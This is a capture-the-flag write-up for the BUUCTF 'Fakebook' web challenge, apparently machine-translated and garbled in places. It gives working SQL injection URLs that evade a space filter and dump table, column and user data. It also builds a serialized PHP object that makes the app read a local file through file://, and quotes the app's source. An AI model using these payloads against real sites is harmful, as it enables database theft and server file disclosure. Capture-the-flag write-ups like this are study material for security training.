BUUCTF WEB Fakebook
Log into the page has found a registered! ! !
Register an account login:
there are parameters, the following should be displayed in the URL address of your blog! ! !
There is certainly parameter SQL injection attempts! ! There is found the blinds! no = 1 = 1 = 1 and no = 1 = 0 = 1 Echo is not the same! !
But it seems there is an error injection! ! There are four fields! !
Later found the space to be filtered? ? Use / ** / place, given the presence of injection:
Try injection:
http://c6cbeecb-15c6-4e8d-ac30-96e071441c16.node3.buuoj.cn/view.php?no=0/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),3,4#
http://c6cbeecb-15c6-4e8d-ac30-96e071441c16.node3.buuoj.cn/view.php?no=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=%27users%27),3,4#
Column name users of the table:
a look at the contents:
http://c6cbeecb-15c6-4e8d-ac30-96e071441c16.node3.buuoj.cn/view.php?no=0/**/union/**/select/**/1,(select/**/group_concat(data)/**/from/**/users),3,4#
It is stored value after deserialization? ? ? ?
In fact, an error page when there are displayed:
a closer look at the string after serialization, found that those who value the input of our registration, but then how to operate it? ?
Doubt it will read the contents of the blog, and then of his / her blog at the show ~ ~ but we do not know where the flag in the contents
after attempts to found flag.php page, then we can read through the file protocol contents of the file
we construct a new sequence of strings:
O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:123;s:4:"blog";s:29:"file:///var/www/html/flag.php";}
When sql query, the query field value that does not exist, is not being given
directly into:
http://c6cbeecb-15c6-4e8d-ac30-96e071441c16.node3.buuoj.cn/view.php?no=0/**/union/**/select/**/1,2,3,%27O:8:%22UserInfo%22:3:{s:4:%22name%22;s:5:%22admin%22;s:3:%22age%22;i:123;s:4:%22blog%22;s:29:%22file:///var/www/html/flag.php%22;}%27#
Get:
Click to enter, view the source code to flag:
Actually This question has a robots.txt ,,,,
there is a backup file:
<?php
class UserInfo
{
public $name = "";
public $age = 0;
public $blog = "";
public function __construct($name, $age, $blog)
{
$this->name = $name;
$this->age = (int)$age;
$this->blog = $blog;
}
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($httpCode == 404) {
return 404;
}
curl_close($ch);
return $output;
}
public function getBlogContents ()
{
return $this->get($this->blog);
}
public function isValidBlog ()
{
$blog = $this->blog;
return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
}
}
Get to look at this function, it should be read url contents! That's when we register can write directly to file it? ?
emmmm, it seems not:
should be a function isValidBlog () function! ! So we can only be acquired through the content flag.php inside the sql statement ,,,
see a big brother more violent, will be able to directly read the contents of flag.php file with the SQL statement:
I did not expect to perform here load_file () function ,,,,
this should be unexpected, right ,,, learn learn! ! !
